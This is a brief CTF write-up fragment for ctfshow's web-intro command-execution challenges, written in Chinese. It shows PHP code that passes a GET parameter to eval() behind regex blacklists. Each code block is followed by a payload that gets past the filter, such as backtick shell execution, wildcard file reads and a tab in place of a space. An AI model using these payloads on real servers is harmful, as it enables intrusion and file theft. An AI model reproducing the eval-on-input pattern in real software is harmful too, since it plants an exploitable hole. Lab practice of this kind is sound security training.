if(isset($_GET[‘c‘])){
$c = $_GET[‘c‘];
if(!preg_match("/flag/i", $c)){
eval($c);
}
}
else{
highlight_file(__FILE__);
}
/?c=system(“ls”);
#找到flag.php/?c=system(“cat fla*”);
if(isset($_GET[‘c‘])){
$c = $_GET[‘c‘];
if(!preg_match("/flag|system|php/i", $c)){
eval($c);
}
}else{
highlight_file(__FILE__);
}
?c=echo `cat *` ;
if(isset($_GET[‘c‘])){
$c = $_GET[‘c‘];
if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\‘/i", $c)){
eval($c);
}
}else{
highlight_file(__FILE__);
}
?c=echo `tac%09*`;
ctfshow WEB入门 命令执行 web29-web122
原文:https://www.cnblogs.com/QmVzdGxteQ/p/14993496.html